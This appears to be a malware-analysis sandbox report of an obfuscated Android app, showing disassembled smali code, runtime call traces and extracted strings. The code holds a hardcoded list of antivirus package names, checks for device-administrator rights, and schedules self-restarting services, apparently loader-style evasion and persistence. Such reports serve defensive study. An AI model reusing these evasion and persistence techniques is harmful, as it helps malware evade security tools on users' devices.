43invoke-direct {v2, v3}, Ljava/lang/String;-><init>([B)V
  • Time: 43871
    • This:
      • YRkFJMV
    • p0: [B@2930bfa6
    • p0: YRkFJMV
    • p0: 59526B464A4D56
    • Return:
      • YRkFJMV
  • Time: 43897
    • This:
      • android.content.res.AssetManager
    • p0: [B@3d94f183
    • p0: android.content.res.AssetManager
    • p0: 616E64726F69642E636F6E74656E742E7265732E41737365744D616E61676572
    • Return:
      • android.content.res.AssetManager
  • Time: 43923
    • This:
      • open
    • p0: [B@42b22df
    • p0: open
    • p0: 6F70656E
    • Return:
      • open
  • Time: 43937
    • This:
      • java.lang.String
    • p0: [B@ba589f5
    • p0: java.lang.String
    • p0: 6A6176612E6C616E672E537472696E67
    • Return:
      • java.lang.String
  • Time: 43971
    • This:
      • getAssets
    • p0: [B@15908ed7
    • p0: getAssets
    • p0: 676574417373657473
    • Return:
      • getAssets
  • 63 additional calls hidden ...
45invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
46move-result-object v1
48invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
49move-result-object v0
50return-object v0
Cross References
APIs
  • java.lang.Object.<init>
  • java.util.Arrays.asList
  • java.util.ArrayList.<init>
  • pvsaeqhpgq.zvsin.getSystemService
Strings
  • com.drweb
  • com.eset.ems2.gp
  • com.eset.ems2.beeline
  • com.eset.ems2.kcell
  • com.drweb.pro
  • com.bitdefender.antivirus
  • com.bitdefender.security
  • com.drweb.pro.market
  • com.dianxinos.optimizer.duplay
  • com.kaspersky.kes
  • com.kms.free
  • com.kms.megafon
  • com.kms.mts
  • com.jumobile.manager.systemapp
  • com.qihoo.security
  • com.qihoo.security.lite
  • com.symantec.mobilesecurity
  • device_policy
Position Instruction Meta Information
1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
2new-instance v0, Ljava/util/ArrayList;
3const/16 v1, 0x11
4new-array v1, v1, [Ljava/lang/String;
5const/4 v2, 0x0
7const-string v3, "com.drweb"
8aput-object v3, v1, v2
9const/4 v2, 0x1
11const-string v3, "com.eset.ems2.gp"
12aput-object v3, v1, v2
13const/4 v2, 0x2
15const-string v3, "com.eset.ems2.beeline"
16aput-object v3, v1, v2
17const/4 v2, 0x3
19const-string v3, "com.eset.ems2.kcell"
20aput-object v3, v1, v2
21const/4 v2, 0x4
23const-string v3, "com.drweb.pro"
24aput-object v3, v1, v2
25const/4 v2, 0x5
27const-string v3, "com.bitdefender.antivirus"
28aput-object v3, v1, v2
29const/4 v2, 0x6
31const-string v3, "com.bitdefender.security"
32aput-object v3, v1, v2
33const/4 v2, 0x7
35const-string v3, "com.drweb.pro.market"
36aput-object v3, v1, v2
37const/16 v2, 0x8
39const-string v3, "com.dianxinos.optimizer.duplay"
40aput-object v3, v1, v2
41const/16 v2, 0x9
43const-string v3, "com.kaspersky.kes"
44aput-object v3, v1, v2
45const/16 v2, 0xa
47const-string v3, "com.kms.free"
48aput-object v3, v1, v2
49const/16 v2, 0xb
51const-string v3, "com.kms.megafon"
52aput-object v3, v1, v2
53const/16 v2, 0xc
55const-string v3, "com.kms.mts"
56aput-object v3, v1, v2
57const/16 v2, 0xd
59const-string v3, "com.jumobile.manager.systemapp"
60aput-object v3, v1, v2
61const/16 v2, 0xe
63const-string v3, "com.qihoo.security"
64aput-object v3, v1, v2
65const/16 v2, 0xf
67const-string v3, "com.qihoo.security.lite"
68aput-object v3, v1, v2
69const/16 v2, 0x10
71const-string v3, "com.symantec.mobilesecurity"
72aput-object v3, v1, v2
74invoke-static {v1}, Ljava/util/Arrays;->asList([Ljava/lang/Object;)Ljava/util/List;
75move-result-object v1
77invoke-direct {v0, v1}, Ljava/util/ArrayList;-><init>(Ljava/util/Collection;)V
78iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;->LmcGi:Ljava/util/ArrayList;
79iput-object p1, p0, Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;->hZyMGHgz:Landroid/content/Context;
80iput-object p2, p0, Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;->xnLvoQ:Lcom/czybg/eqtbdmzpklrgyns/OfsZk;
82const-string v0, "device_policy"
84invoke-virtual {p1, v0}, Landroid/content/Context;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
  • Time: 56039
    • This:
      • pvsaeqhpgq.zvsin@15460b30
    • p0: device_policy
    • Return:
      • android.app.admin.DevicePolicyManager@1f2c60aa
85move-result-object v0
86check-cast v0, Landroid/app/admin/DevicePolicyManager;
87iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;->Odjrct:Landroid/app/admin/DevicePolicyManager;
88return-void
APIs
  • com.czybg.eqtbdmzpklrgyns.EZmcnv.xnLvoQ
  • java.lang.String.isEmpty
  • com.czybg.eqtbdmzpklrgyns.EZmcnv.hZyMGHgz
  • java.lang.String.isEmpty
  • android.content.Intent.getStringExtra
  • com.czybg.eqtbdmzpklrgyns.KezZERjCGv7fpQLHuQ.getApplication
  • android.content.SharedPreferences.edit
  • android.content.SharedPreferences$Editor.putString
  • android.content.SharedPreferences$Editor.commit
  • android.content.SharedPreferences.edit
  • android.content.SharedPreferences$Editor.putString
  • android.content.SharedPreferences$Editor.commit
Strings
  • default
  • tag
  • sdkId
  • szzRas4x
  • b3cdc6fb1426531e4bc370f3a2fb3fecb8c7bfed
  • apk.loader.v14
  • kgfhjkhfshafd
  • ttrgsvwser
Position Instruction Meta Information
0const/4 v4, 0x1
2sget-object v0, Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;->Odjrct:Ljava/lang/String;
3if-nez v0, :cond_19
5iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;->hZyMGHgz:Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;
7invoke-virtual {v0}, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;->xnLvoQ()Ljava/lang/String;
8move-result-object v0
10invoke-virtual {v0}, Ljava/lang/String;->isEmpty()Z
11move-result v0
12if-eqz v0, :cond_46
14const-string v0, "tag"
16invoke-virtual {p1, v0}, Landroid/content/Intent;->getStringExtra(Ljava/lang/String;)Ljava/lang/String;
  • Time: 56116
    • This:
      • Intent { cmp=com.czybg.eqtbdmzpklrgyns/.KezZERjCGv7fpQLHuQ (has extras) }
    • p0: tag
    • Return:
      • default
17move-result-object v0
18goto_17: sput-object v0, Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;->Odjrct:Ljava/lang/String;
19cond_19:
20sget-object v0, Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;->LmcGi:Ljava/lang/String;
21if-nez v0, :cond_31
23iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;->hZyMGHgz:Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;
25invoke-virtual {v0}, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;->hZyMGHgz()Ljava/lang/String;
26move-result-object v0
28invoke-virtual {v0}, Ljava/lang/String;->isEmpty()Z
29move-result v0
30if-eqz v0, :cond_4d
32const-string v0, "sdkId"
34invoke-virtual {p1, v0}, Landroid/content/Intent;->getStringExtra(Ljava/lang/String;)Ljava/lang/String;
  • Time: 56128
    • This:
      • Intent { cmp=com.czybg.eqtbdmzpklrgyns/.KezZERjCGv7fpQLHuQ (has extras) }
    • p0: sdkId
    • Return:
      • szzRas4x
35move-result-object v0
36goto_2f: sput-object v0, Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;->LmcGi:Ljava/lang/String;
37cond_31:
38invoke-static {p0}, Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;->DiXsQ(Landroid/content/Context;)Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;
39move-result-object v0
41invoke-virtual {v0, p1}, Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;->DiXsQ(Landroid/content/Intent;)V
43iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;->jVOak:Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;
44if-eqz v0, :cond_41
46iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;->jVOak:Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;
48invoke-virtual {v0}, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->LmcGi()V
49cond_41: iget-boolean v0, p0, Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;->xnLvoQ:Z
50if-eqz v0, :cond_54
51goto_45: return v4
52cond_46:
53iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;->hZyMGHgz:Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;
55invoke-virtual {v0}, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;->xnLvoQ()Ljava/lang/String;
56move-result-object v0
57goto/16 :goto_17
58cond_4d:
59iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;->hZyMGHgz:Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;
61invoke-virtual {v0}, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;->hZyMGHgz()Ljava/lang/String;
62move-result-object v0
63goto/16 :goto_2f
64cond_54: sget-boolean v0, Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;->DiXsQ:Z
65if-nez v0, :cond_83
67const-string v0, "b3cdc6fb1426531e4bc370f3a2fb3fecb8c7bfed"
69invoke-static {v0}, Lmpio/fabric/sdk/android/services/common/ApiKey;->setApiKey(Ljava/lang/String;)V
70new-instance v0, Lmpio/fabric/sdk/android/Fabric$Builder;
72invoke-virtual {p0}, Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;->getApplication()Landroid/app/Application;
73move-result-object v1
75invoke-direct {v0, v1}, Lmpio/fabric/sdk/android/Fabric$Builder;-><init>(Landroid/content/Context;)V
76new-array v1, v4, [Lmpio/fabric/sdk/android/Kit;
77const/4 v2, 0x0
78new-instance v3, Lmpcom/crashlytics/android/Crashlytics;
80invoke-direct {v3}, Lmpcom/crashlytics/android/Crashlytics;-><init>()V
81aput-object v3, v1, v2
83invoke-virtual {v0, v1}, Lmpio/fabric/sdk/android/Fabric$Builder;->kits([Lmpio/fabric/sdk/android/Kit;)Lmpio/fabric/sdk/android/Fabric$Builder;
84move-result-object v0
86const-string v1, "apk.loader.v14"
88invoke-virtual {v0, v1}, Lmpio/fabric/sdk/android/Fabric$Builder;->appIdentifier(Ljava/lang/String;)Lmpio/fabric/sdk/android/Fabric$Builder;
89move-result-object v0
91invoke-virtual {v0}, Lmpio/fabric/sdk/android/Fabric$Builder;->build()Lmpio/fabric/sdk/android/Fabric;
92move-result-object v0
94invoke-static {v0}, Lmpio/fabric/sdk/android/Fabric;->with(Lmpio/fabric/sdk/android/Fabric;)Lmpio/fabric/sdk/android/Fabric;
95sput-boolean v4, Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;->DiXsQ:Z
96cond_83: iput-boolean v4, p0, Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;->xnLvoQ:Z
98sget-object v0, Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;->Odjrct:Ljava/lang/String;
99if-eqz v0, :cond_45
101sget-object v0, Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;->LmcGi:Ljava/lang/String;
102if-eqz v0, :cond_45
103iput-boolean v4, p0, Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;->xnLvoQ:Z
105iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;->hZyMGHgz:Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;
107sget-object v1, Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;->Odjrct:Ljava/lang/String;
109iget-object v0, v0, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;->DiXsQ:Landroid/content/SharedPreferences;
111invoke-interface {v0}, Landroid/content/SharedPreferences;->edit()Landroid/content/SharedPreferences$Editor;
112move-result-object v0
114const-string v2, "kgfhjkhfshafd"
116invoke-interface {v0, v2, v1}, Landroid/content/SharedPreferences$Editor;->putString(Ljava/lang/String;Ljava/lang/String;)Landroid/content/SharedPreferences$Editor;
117move-result-object v0
119invoke-interface {v0}, Landroid/content/SharedPreferences$Editor;->commit()Z
121iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;->hZyMGHgz:Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;
123sget-object v1, Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;->LmcGi:Ljava/lang/String;
125iget-object v0, v0, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;->DiXsQ:Landroid/content/SharedPreferences;
127invoke-interface {v0}, Landroid/content/SharedPreferences;->edit()Landroid/content/SharedPreferences$Editor;
128move-result-object v0
130const-string v2, "ttrgsvwser"
132invoke-interface {v0, v2, v1}, Landroid/content/SharedPreferences$Editor;->putString(Ljava/lang/String;Ljava/lang/String;)Landroid/content/SharedPreferences$Editor;
133move-result-object v0
135invoke-interface {v0}, Landroid/content/SharedPreferences$Editor;->commit()Z
136new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;
138invoke-direct {v0, p0}, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;-><init>(Landroid/content/Context;)V
139iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;->CyGFDR:Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;
140new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;
142iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;->CyGFDR:Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;
144sget-object v2, Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;->Odjrct:Ljava/lang/String;
146sget-object v3, Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;->LmcGi:Ljava/lang/String;
148invoke-direct {v0, p0, v1, v2, v3}, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;-><init>(Landroid/content/Context;Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;Ljava/lang/String;Ljava/lang/String;)V
149new-instance v1, Lcom/czybg/eqtbdmzpklrgyns/JPzRV;
151invoke-direct {v1, p0}, Lcom/czybg/eqtbdmzpklrgyns/JPzRV;-><init>(Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;)V
152iput-object v1, v0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->xfPEz:Lcom/czybg/eqtbdmzpklrgyns/CigeEH;
153iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;->jVOak:Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;
155iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;->jVOak:Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;
157invoke-virtual {v0}, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->DiXsQ()V
158goto/16 :goto_45
APIs
  • android.content.SharedPreferences.getLong
  • java.lang.System.currentTimeMillis
  • android.app.Service.startForeground
  • android.content.Intent.<init>
  • com.czybg.eqtbdmzpklrgyns.KezZERjCGv7fpQLHuQ.startService
  • android.os.Looper.getMainLooper
  • android.os.Handler.<init>
  • android.os.Handler.postDelayed
  • android.content.Context.getSharedPreferences
  • android.content.SharedPreferences.getLong
  • java.lang.System.currentTimeMillis
  • android.content.SharedPreferences.edit
  • android.content.SharedPreferences$Editor.putLong
  • android.content.SharedPreferences$Editor.commit
Strings
  • frgSrvcEnbldBfr
  • installTime
  • install_time
Position Instruction Meta Information
0const-wide/16 v5, 0x0
2invoke-static {p0}, Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;->DiXsQ(Landroid/content/Context;)Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;
3move-result-object v0
4new-instance v1, Lcom/czybg/eqtbdmzpklrgyns/IVPcyiFs;
6invoke-direct {v1, p0}, Lcom/czybg/eqtbdmzpklrgyns/IVPcyiFs;-><init>(Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;)V
8iget-object v0, v0, Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;->xnLvoQ:Lcom/czybg/eqtbdmzpklrgyns/qwAiT;
9iput-object v1, v0, Lcom/czybg/eqtbdmzpklrgyns/qwAiT;->hZyMGHgz:Lcom/czybg/eqtbdmzpklrgyns/EvqAMX;
11invoke-static {p0}, Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;->DiXsQ(Landroid/content/Context;)Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;
12move-result-object v0
13iput-object p0, v0, Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;->Odjrct:Landroid/app/Service;
15iget-object v1, v0, Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;->DiXsQ:Landroid/content/Context;
17invoke-static {v1}, Lcom/czybg/eqtbdmzpklrgyns/HLqFdR;->LmcGi(Landroid/content/Context;)Z
18move-result v1
19if-eqz v1, :cond_2d
21iget-object v1, v0, Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;->LmcGi:Landroid/content/SharedPreferences;
23const-string v2, "frgSrvcEnbldBfr"
25invoke-interface {v1, v2, v5, v6}, Landroid/content/SharedPreferences;->getLong(Ljava/lang/String;J)J
26move-result-wide v1
28invoke-static {}, Ljava/lang/System;->currentTimeMillis()J
29move-result-wide v3
30cmp-long v1, v1, v3
31if-lez v1, :cond_44
32cond_2d: const/16 v1, 0xe4
34iget-object v2, v0, Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;->DiXsQ:Landroid/content/Context;
36invoke-static {v2}, Lcom/czybg/eqtbdmzpklrgyns/HLqFdR;->hZyMGHgz(Landroid/content/Context;)Landroid/app/Notification;
37move-result-object v2
39invoke-virtual {p0, v1, v2}, Landroid/app/Service;->startForeground(ILandroid/app/Notification;)V
40new-instance v1, Landroid/content/Intent;
42iget-object v2, v0, Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;->DiXsQ:Landroid/content/Context;
43const-class v3, Lcom/czybg/eqtbdmzpklrgyns/Vdptsq/MCq9ggDf53Iz0h;
45invoke-direct {v1, v2, v3}, Landroid/content/Intent;-><init>(Landroid/content/Context;Ljava/lang/Class;)V
47invoke-virtual {p0, v1}, Landroid/app/Service;->startService(Landroid/content/Intent;)Landroid/content/ComponentName;
  • Time: 56093
    • This:
      • com.czybg.eqtbdmzpklrgyns.KezZERjCGv7fpQLHuQ@3447ad20
    • p0: Intent { cmp=com.czybg.eqtbdmzpklrgyns/.Vdptsq.MCq9ggDf53Iz0h }
    • Return:
      • ComponentInfo{com.czybg.eqtbdmzpklrgyns/com.czybg.eqtbdmzpklrgyns.Vdptsq.MCq9ggDf53Iz0h}
48cond_44:
49iget-object v0, v0, Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;->xnLvoQ:Lcom/czybg/eqtbdmzpklrgyns/qwAiT;
50iput-object p0, v0, Lcom/czybg/eqtbdmzpklrgyns/qwAiT;->LmcGi:Landroid/app/Service;
51new-instance v1, Landroid/os/Handler;
53invoke-static {}, Landroid/os/Looper;->getMainLooper()Landroid/os/Looper;
54move-result-object v2
56invoke-direct {v1, v2}, Landroid/os/Handler;-><init>(Landroid/os/Looper;)V
57new-instance v2, Lcom/czybg/eqtbdmzpklrgyns/yCJnDqab;
59invoke-direct {v2, v0, p0, v1}, Lcom/czybg/eqtbdmzpklrgyns/yCJnDqab;-><init>(Lcom/czybg/eqtbdmzpklrgyns/qwAiT;Landroid/app/Service;Landroid/os/Handler;)V
60const-wide/32 v3, 0x927c0
62invoke-virtual {v1, v2, v3, v4}, Landroid/os/Handler;->postDelayed(Ljava/lang/Runnable;J)Z
63new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;
65invoke-direct {v0, p0}, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;-><init>(Landroid/content/Context;)V
66iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;->hZyMGHgz:Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;
68const-string v0, "installTime"
69const/4 v1, 0x0
71invoke-virtual {p0, v0, v1}, Landroid/content/Context;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences;
72move-result-object v0
74const-string v1, "install_time"
76invoke-interface {v0, v1, v5, v6}, Landroid/content/SharedPreferences;->getLong(Ljava/lang/String;J)J
77move-result-wide v1
78cmp-long v1, v1, v5
79if-nez v1, :cond_85
81invoke-static {}, Ljava/lang/System;->currentTimeMillis()J
82move-result-wide v1
84invoke-interface {v0}, Landroid/content/SharedPreferences;->edit()Landroid/content/SharedPreferences$Editor;
85move-result-object v0
87const-string v3, "install_time"
89invoke-interface {v0, v3, v1, v2}, Landroid/content/SharedPreferences$Editor;->putLong(Ljava/lang/String;J)Landroid/content/SharedPreferences$Editor;
90move-result-object v0
92invoke-interface {v0}, Landroid/content/SharedPreferences$Editor;->commit()Z
93cond_85: return-void
Cross References
APIs
  • android.content.Intent.<init>
  • android.content.Intent.putExtra
  • android.app.PendingIntent.getService
  • pvsaeqhpgq.zvsin.getApplicationContext
  • pvsaeqhpgq.zvsin.getSystemService
  • java.lang.System.currentTimeMillis
  • android.app.AlarmManager.setAndAllowWhileIdle
  • java.lang.System.currentTimeMillis
  • android.app.AlarmManager.set
Strings
  • restart
  • alarm
Position Instruction Meta Information
0const/4 v4, 0x0
1new-instance v0, Landroid/content/Intent;
3iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/qwAiT;->Odjrct:Landroid/content/Context;
4const-class v2, Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;
6invoke-direct {v0, v1, v2}, Landroid/content/Intent;-><init>(Landroid/content/Context;Ljava/lang/Class;)V
8const-string v1, "restart"
9const/4 v2, 0x1
11invoke-virtual {v0, v1, v2}, Landroid/content/Intent;->putExtra(Ljava/lang/String;Z)Landroid/content/Intent;
13iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/qwAiT;->Odjrct:Landroid/content/Context;
15invoke-virtual {v1}, Landroid/content/Context;->getApplicationContext()Landroid/content/Context;
  • Time: 56019
    • This:
      • pvsaeqhpgq.zvsin@15460b30
    • Return:
      • pvsaeqhpgq.zvsin@15460b30
16move-result-object v1
17const/high16 v2, 0x50000000
19invoke-static {v1, v4, v0, v2}, Landroid/app/PendingIntent;->getService(Landroid/content/Context;ILandroid/content/Intent;I)Landroid/app/PendingIntent;
20move-result-object v1
22iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/qwAiT;->Odjrct:Landroid/content/Context;
24invoke-virtual {v0}, Landroid/content/Context;->getApplicationContext()Landroid/content/Context;
  • Time: 56022
    • This:
      • pvsaeqhpgq.zvsin@15460b30
    • Return:
      • pvsaeqhpgq.zvsin@15460b30
25move-result-object v0
27const-string v2, "alarm"
29invoke-virtual {v0, v2}, Landroid/content/Context;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
  • Time: 56024
    • This:
      • pvsaeqhpgq.zvsin@15460b30
    • p0: alarm
    • Return:
      • android.app.AlarmManager@eca0038
30move-result-object v0
31check-cast v0, Landroid/app/AlarmManager;
32sget v2, Landroid/os/Build$VERSION;->SDK_INT:I
33const/16 v3, 0x17
34if-lt v2, v3, :cond_39
36invoke-static {}, Ljava/lang/System;->currentTimeMillis()J
37move-result-wide v2
38add-long/2addr v2, p1
40invoke-virtual {v0, v4, v2, v3, v1}, Landroid/app/AlarmManager;->setAndAllowWhileIdle(IJLandroid/app/PendingIntent;)V
41goto_38: return-void
42cond_39:
43invoke-static {}, Ljava/lang/System;->currentTimeMillis()J
44move-result-wide v2
45add-long/2addr v2, p1
47invoke-virtual {v0, v4, v2, v3, v1}, Landroid/app/AlarmManager;->set(IJLandroid/app/PendingIntent;)V
48goto/16 :goto_38
Cross References
APIs
  • pvsaeqhpgq.zvsin.getSystemService
  • android.app.admin.DevicePolicyManager.getActiveAdmins
  • java.util.List.isEmpty
  • java.util.List.iterator
  • java.util.Iterator.hasNext
  • java.util.Iterator.next
  • android.content.ComponentName.getPackageName
  • pvsaeqhpgq.zvsin.getPackageName
  • java.lang.String.equals
Strings
  • device_policy
  • com.czybg.eqtbdmzpklrgyns
Position Instruction Meta Information
1const-string v0, "device_policy"
3invoke-virtual {p0, v0}, Landroid/content/Context;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
  • Time: 56014
    • This:
      • pvsaeqhpgq.zvsin@15460b30
    • p0: device_policy
    • Return:
      • android.app.admin.DevicePolicyManager@1f2c60aa
4move-result-object v0
5check-cast v0, Landroid/app/admin/DevicePolicyManager;
7invoke-virtual {v0}, Landroid/app/admin/DevicePolicyManager;->getActiveAdmins()Ljava/util/List;
8move-result-object v0
9if-eqz v0, :cond_34
11invoke-interface {v0}, Ljava/util/List;->isEmpty()Z
12move-result v1
13if-nez v1, :cond_34
15invoke-interface {v0}, Ljava/util/List;->iterator()Ljava/util/Iterator;
16move-result-object v1
17cond_18:
18invoke-interface {v1}, Ljava/util/Iterator;->hasNext()Z
19move-result v0
20if-eqz v0, :cond_34
22invoke-interface {v1}, Ljava/util/Iterator;->next()Ljava/lang/Object;
23move-result-object v0
24check-cast v0, Landroid/content/ComponentName;
26invoke-virtual {v0}, Landroid/content/ComponentName;->getPackageName()Ljava/lang/String;
27move-result-object v0
29invoke-virtual {p0}, Landroid/content/Context;->getPackageName()Ljava/lang/String;
  • Time: 56017
    • This:
      • pvsaeqhpgq.zvsin@15460b30
    • Return:
      • com.czybg.eqtbdmzpklrgyns
30move-result-object v2
32invoke-virtual {v0, v2}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
33move-result v0
34if-eqz v0, :cond_18
35const/4 v0, 0x1
36goto_33: return v0
37cond_34: const/4 v0, 0x0
38goto/16 :goto_33
Cross References
APIs
  • android.content.Intent.<init>
  • android.content.Intent.putExtra
  • com.czybg.eqtbdmzpklrgyns.MainApp.startService
Strings
  • default
  • tag
  • sdkId
  • szzRas4x
Position Instruction Meta Information
1invoke-static {p0}, Lcom/czybg/eqtbdmzpklrgyns/HLqFdR;->xnLvoQ(Landroid/content/Context;)Z
2move-result v0
3if-eqz v0, :cond_7
4goto_6: return-void
5cond_7: new-instance v0, Landroid/content/Intent;
6const-class v1, Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;
8invoke-direct {v0, p0, v1}, Landroid/content/Intent;-><init>(Landroid/content/Context;Ljava/lang/Class;)V
10const-string v1, "tag"
12invoke-virtual {v0, v1, p1}, Landroid/content/Intent;->putExtra(Ljava/lang/String;Ljava/lang/String;)Landroid/content/Intent;
  • Time: 55946
    • This:
      • Intent { cmp=com.czybg.eqtbdmzpklrgyns/.KezZERjCGv7fpQLHuQ (has extras) }
    • p0: tag
    • p1: default
    • Return:
      • Intent { cmp=com.czybg.eqtbdmzpklrgyns/.KezZERjCGv7fpQLHuQ (has extras) }
13move-result-object v1
15const-string v2, "sdkId"
17invoke-virtual {v1, v2, p2}, Landroid/content/Intent;->putExtra(Ljava/lang/String;Ljava/lang/String;)Landroid/content/Intent;
  • Time: 55950
    • This:
      • Intent { cmp=com.czybg.eqtbdmzpklrgyns/.KezZERjCGv7fpQLHuQ (has extras) }
    • p0: sdkId
    • p1: szzRas4x
    • Return:
      • Intent { cmp=com.czybg.eqtbdmzpklrgyns/.KezZERjCGv7fpQLHuQ (has extras) }
19invoke-virtual {p0, v0}, Landroid/content/Context;->startService(Landroid/content/Intent;)Landroid/content/ComponentName;
  • Time: 55954
    • This:
      • com.czybg.eqtbdmzpklrgyns.MainApp@850754a
    • p0: Intent { cmp=com.czybg.eqtbdmzpklrgyns/.KezZERjCGv7fpQLHuQ (has extras) }
    • Return:
      • ComponentInfo{com.czybg.eqtbdmzpklrgyns/com.czybg.eqtbdmzpklrgyns.KezZERjCGv7fpQLHuQ}
20goto/16 :goto_6
Cross References
APIs
  • java.lang.Object.<init>
  • com.czybg.eqtbdmzpklrgyns.KezZERjCGv7fpQLHuQ.getApplicationContext
  • java.lang.Thread.setDefaultUncaughtExceptionHandler
  • android.content.Context.getSharedPreferences
Strings
  • AD2
Position Instruction Meta Information
0const/4 v3, 0x0
2invoke-direct {p0}, Ljava/lang/Object;-><init>()V
4invoke-virtual {p1}, Landroid/content/Context;->getApplicationContext()Landroid/content/Context;
  • Time: 55980
    • This:
      • com.czybg.eqtbdmzpklrgyns.KezZERjCGv7fpQLHuQ@3447ad20
    • Return:
      • pvsaeqhpgq.zvsin@15460b30
5move-result-object v0
6iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;->DiXsQ:Landroid/content/Context;
7new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/qwAiT;
9iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;->DiXsQ:Landroid/content/Context;
11invoke-direct {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/qwAiT;-><init>(Landroid/content/Context;)V
